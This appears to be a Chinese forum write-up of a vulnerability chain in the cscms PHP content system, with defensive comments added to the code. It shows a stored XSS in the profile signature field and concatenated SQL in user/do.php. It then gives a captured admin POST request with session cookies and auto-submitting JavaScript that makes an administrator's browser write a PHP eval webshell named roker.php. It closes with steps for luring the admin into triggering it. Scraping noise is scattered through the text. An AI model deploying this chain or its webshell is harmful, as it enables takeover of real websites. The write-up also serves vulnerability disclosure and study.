这个 cms 以前 90 有人发了个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下了源码。
因为后台登入还需要认证码，所以注入就没看了。
存在 xss。
漏洞文件 user/member/skin_edit.php
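<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php
    // The signature is user-controlled and is stored by user/do.php without any
    // filtering, so it must be HTML-encoded when it is written back into the page.
    // The original template echoed $cscms_qianm raw; a stored value containing a
    // closing textarea tag therefore escaped the textarea and ran as markup --
    // the stored-XSS sink described in this post. Encoding on output closes it
    // regardless of what was stored.
    echo htmlspecialchars($cscms_qianm, ENT_QUOTES, 'UTF-8');
?></textarea></td></tr>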
user/do.php
if($op=='zl'){ // profile ("资料") update
    // Only these four fields are required; the signature ($CS_Qianm) is not
    // validated at all before it is stored.
    if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
        exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
    // NOTE(review): every user-supplied value is concatenated straight into the
    // UPDATE statement. Nothing in this block escapes or encodes them, and
    // whether an earlier include does so is not visible here; CS_Sex is not
    // even quoted. Separately, CS_Qianm is stored verbatim and the
    // skin_edit.php template in this post echoes it back without HTML
    // encoding, which is the stored-XSS sink. Fix on output with
    // htmlspecialchars(), and pass these values through the DB layer's
    // parameterised query / escaping facility rather than string-building SQL.
    $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
 CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
 where CS_Name='".$cscms_name."'";
    if($db->query($sql)){
        exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
    }else{
        exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
    }
    // (the closing brace of the $op=='zl' branch is not shown in the post)
没有过滤，导致 xss 产生。
后台看了下，很奇葩的是可以写任意格式文件。
抓包：
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
" z7 |. s5 @. v- A3 _" M$ q
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
" |* q8 |5 r2 I7 X3 |' k- z
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
! s: s3 V- d. W: z" j. RCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655948 U R. P7 k% s! I. D
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
于是构造 js 如下。
<script>
7 [! X# h# |2 f1 L0 g' B; ]9 ithisTHost = top.location.hostname;
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";" P( Q! e2 v# c
// Builds a hidden HTML form with two fields, "name" and "content", and submits
// it as a POST to `url`. The field values come from `data` and `msg`
// respectively (note the parameter names do not match the field names).
//
// Defender's note: an auto-submitting form like this is the classic CSRF
// shape. It works against the admin endpoint captured above only because the
// browser attaches the admin's session cookies and the captured POST body
// carries just `name` and `content`, with no anti-CSRF token to tie the
// request to a page the admin actually opened. Server-side mitigation is a
// per-session CSRF token verified on every state-changing admin action,
// SameSite session cookies, and an allow-list of template file extensions so
// the template editor cannot write arbitrary file types.
function PostSubmit(url, data, msg) {
  var postUrl = url;
  var postData = data;
  var msgData = msg;
  var ExportForm = document.createElement("FORM");
  document.body.appendChild(ExportForm);
  ExportForm.method = "POST";
  // First hidden field: "name" <- `data`.
  var newElement = document.createElement("input");
  newElement.setAttribute("name", "name");
  newElement.setAttribute("type", "hidden");
  // Second hidden field: "content" <- `msg`.
  var newElement2 = document.createElement("input");
  newElement2.setAttribute("name", "content");
  newElement2.setAttribute("type", "hidden");
  ExportForm.appendChild(newElement);
  ExportForm.appendChild(newElement2);
  newElement.value = postData;
  newElement2.value = msgData;
  ExportForm.action = postUrl;
  ExportForm.submit();
};
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
</script>
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处插入。
用你的账号给管理写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改）。
就会在 skins\index\html\ 目录下生成 roker.php 一句话。